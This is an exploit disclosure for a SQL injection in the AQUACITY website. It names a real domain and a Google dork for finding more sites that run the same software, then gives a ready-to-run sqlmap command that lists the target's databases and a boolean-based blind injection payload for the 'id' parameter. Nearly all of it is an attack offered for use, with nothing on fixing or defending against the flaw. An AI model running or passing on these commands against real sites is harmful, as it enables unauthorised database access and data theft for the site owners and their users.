****************************
#Exploit Title: AQUACITY - SQL Injection vulnerability
#Date: 2020-12-29
#Exploit Author: darksecurity team
#Vendor Homepage: https://www.aquacity.com.pk
#Google Dork: "Powered by Aquacity"
#Tested On: windows 10
sqlmap:
sqlmap -u "https://www.aquacity.com.pk/page.php?id=1" --dbs
Testing Method;
- boolean-based blind
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4214=4214 AND 'XzSt'='XzSt
**************************************************
#Discovered by: mjoker-mina_ah-mohammad_zo-reza_zo
**************************************************